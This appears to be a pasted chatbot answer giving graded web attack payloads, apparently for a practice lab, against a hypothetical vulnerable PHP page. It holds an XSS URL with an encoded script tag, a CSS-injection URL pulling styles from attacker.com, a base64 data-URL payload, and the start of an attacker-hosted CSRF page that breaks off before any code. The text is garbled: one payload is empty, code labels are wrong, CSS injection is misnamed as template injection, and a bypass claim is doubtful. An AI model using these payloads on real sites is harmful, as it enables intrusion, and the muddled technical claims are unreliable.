XSS (Cross-site Scripting): Difficulty 1: php Copy code http://example.com/vulnerable_page.php?message= Difficulty 2: The output is sanitized, so the regular XSS attack won't work. You need to bypass the sanitization. However, it's not exploitable with the provided code, as the HTML special characters are encoded. Difficulty 3: perl Copy code http://example.com/vulnerable_page.php?message=%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E This uses URL encoding to bypass the filtering. CSTI (Client-Side Template Injection): Difficulty 1: bash Copy code http://example.com/vulnerable_page.php?css=http://attacker.com/malicious_styles.css Difficulty 2: bash Copy code http://example.com/vulnerable_page.php?css=data:text/css;base64,Ym9keXtiYWNrZ3JvdW5kLWNvbG9yOnJlZDt9 This uses a data URL to inject malicious CSS. In this example, the CSS will change the background color to red. You can replace the base64-encoded payload with your malicious styles. CSRF (Cross-Site Request Forgery): Difficulty 1 and 2: For CSRF, you'll create an HTML file hosted on the attacker's website that sends a form request to vulnerable_page.php. Here's an example HTML page that performs a CSRF attack: html Copy code